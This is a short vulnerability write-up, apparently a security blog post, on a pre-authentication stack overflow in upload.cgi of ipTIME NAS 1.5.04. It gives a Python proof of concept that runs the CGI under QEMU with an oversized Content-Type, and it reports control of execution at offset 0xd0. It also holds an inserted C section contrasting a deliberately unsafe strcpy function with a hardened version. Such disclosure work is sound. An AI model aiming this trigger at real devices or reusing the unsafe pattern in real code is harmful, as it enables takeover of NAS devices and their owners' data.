Buffer Overflow in upload.cgi of iptime_nas_1.5.04


The principle of the vulnerability

The vulnerability is caused by an unbounded strcpy of attacker-controlled input into a small stack buffer. Because the authentication logic runs only after that strcpy, the overflow is reachable without credentials, which makes this a pre-authentication vulnerability.


Emulating the CGI with QEMU

command = f'sudo chroot . ./qemu-arm-static -L ./lib -g 1234 ./usr/webroot/upload.cgi'

PoC:

import os

# Content-Type value far longer than the 8-byte stack buffer
count_ones = 5000
content_type_value = 'A' * count_ones

# Run upload.cgi under qemu-arm-static inside the extracted firmware root (chroot .),
# with the firmware's own libraries (-L ./lib), a GDB stub on port 1234 (-g 1234),
# and the oversized CONTENT_TYPE passed in through the CGI environment (-E).
command = f'sudo chroot . ./qemu-arm-static -L ./lib -g 1234 -E CONTENT_TYPE={content_type_value} ./usr/webroot/upload.cgi'

os.system(command)

The result of the attack.

It can be seen that the stack buffer v8 is only 08h (8) bytes.


Eventually the overflow reaches offset 0xd0 and the program's execution flow is controlled. A longer input overflows further if that is needed.
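The strcpy pattern from the principle section next to a bounded, authenticate-first version, as an added C example that is neither the author's nor the vendor's code; CT_MAX, the function names and the ordering of the authentication check are assumptions.

```c
#include <stdlib.h>
#include <string.h>

#define CT_MAX 64  /* longest Content-Type the CGI accepts (assumed policy value) */

/* Hypothetical reconstruction of the bug class: unbounded strcpy of the CONTENT_TYPE
 * CGI variable into a small stack buffer. Shown for contrast only; never call it. */
void parse_content_type_unsafe(const char *content_type)
{
    char buf[8];                /* tiny fixed slot, like the 08h frame on the page */
    strcpy(buf, content_type);  /* no length check: a long header runs past the frame */
}

/* Hardened form: measure with an upper bound, reject oversized input before copying,
 * then copy exactly n bytes and NUL-terminate. Returns 0 on success, -1 on rejection. */
int parse_content_type_safe(const char *content_type, char *out, size_t out_len)
{
    size_t n = 0;
    if (content_type == NULL || out_len == 0)
        return -1;
    while (n <= CT_MAX && content_type[n] != '\0')
        n++;
    if (n > CT_MAX || n >= out_len)
        return -1;              /* too long for the policy or for the destination */
    memcpy(out, content_type, n);
    out[n] = '\0';
    return 0;
}

/* Entry point with the authentication check first (assumed ordering), so the header
 * parser is no longer reachable from an unauthenticated request. -2 = not authenticated. */
int handle_upload(int authenticated, const char *content_type, char *out, size_t out_len)
{
    if (!authenticated) return -2;
    return parse_content_type_safe(content_type, out, out_len);
}

/* Mirrors the PoC: a constructed CONTENT_TYPE of `len` 'A' bytes fed through the
 * hardened path as an authenticated caller; 5000 bytes must come back rejected (-1). */
int check_poc_input(size_t len)
{
    char out[CT_MAX + 1];
    char *ct = malloc(len + 1);
    if (ct == NULL) return -1;
    memset(ct, 'A', len);
    ct[len] = '\0';
    int rc = handle_upload(1, ct, out, sizeof out);
    free(ct);
    return rc;
}
```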


https://lafdrew.github.io/2025/04/25/Buffer-Overflow-in-upload-cgi-of-iptime-nas-1-5-04/
Author: John Doe
Posted on: April 25, 2025